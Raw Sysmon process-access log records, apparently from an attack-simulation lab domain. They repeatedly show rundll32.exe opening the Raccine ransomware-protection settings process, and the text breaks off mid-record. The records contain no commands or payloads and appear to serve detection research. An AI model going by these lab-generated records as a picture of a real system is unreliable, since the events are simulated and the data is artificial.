16:31:59.621{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082815Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.621{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082814Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.621{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082813Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.621{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082812Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.621{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082811Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.621{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082810Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.621{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002048275Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:58.761{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE6106C) 10341000x80000000000000002043481Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.869{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043480Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.869{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043479Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.869{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043478Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.869{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043477Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.869{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043476Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.869{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043475Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.869{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043474Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.869{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043473Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.869{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043472Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.869{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043471Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.869{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043470Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.869{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043469Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.869{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043468Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.869{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043467Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.869{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043466Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.869{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043465Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.868{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043464Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.868{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043463Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.868{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043462Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.868{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043461Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.868{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043460Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.868{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043459Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.868{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043458Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.868{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043457Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.868{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043456Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.868{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043455Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.868{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043454Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.868{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043453Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.868{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043452Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.868{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043451Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.868{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043450Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.868{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043449Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.868{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043448Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.868{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043447Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.868{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043446Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.868{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043445Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.868{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043444Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.868{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043443Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.868{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043442Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.868{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043441Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.868{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043440Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.868{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043439Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.868{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043438Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.868{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043437Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.868{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043436Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.868{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043435Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.868{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043434Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.868{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043433Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043432Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043431Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043430Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043429Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043428Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043427Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043426Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program 